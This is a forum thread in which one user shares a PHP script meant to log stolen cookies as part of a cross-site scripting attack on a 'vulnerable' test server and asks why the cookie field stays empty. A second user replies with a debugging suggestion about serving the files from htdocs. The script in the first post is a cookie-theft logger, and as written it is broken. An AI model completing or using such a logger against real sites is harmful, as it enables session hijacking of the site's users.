Hey, I've been working on this for a bit and I have a php file that I'm trying to redirect to a test server and then get the cookie with XSS basically.

My php file has:
<?php
header('Location: http://vulnerableserver.com/index.php?user1');
$cookie = INI_Get('session.cookie_httponly');
$date = date ("l ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$file = fopen('log.txt', 'a');
fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n");
fclose($file);
?>

So it's writing everything else to the file but the cookie part just shows:
COOKIE:
and there is no sessionId, etc.

I tried using other things like "session_Get_Cookie_Params()" but that just gave me: COOKIE: array

If I go to the website and make a post that has a link for "alert('document.cookie')" then it spits the session ID out right away. How can I basically do the same thing only write it to the file?

Hi wlandymore,

ok this might sound odd - and it's just a thought ...so don't get me wrong, but do you start your html file in a "server-context" meaning is it in your htdocs or do you just open it on your harddrive?

Since if you do the second it won't work or at least you cannot read the cookies from localhost ...(Happend to me too...an alertbox on the page worked however php script could't read cookies...).

For "debuggin" try to throw both scripts in your htdocs ... and look if the php script gets the cookies...

Don't know if this helps, was just a thought....

Cheers,
-gromic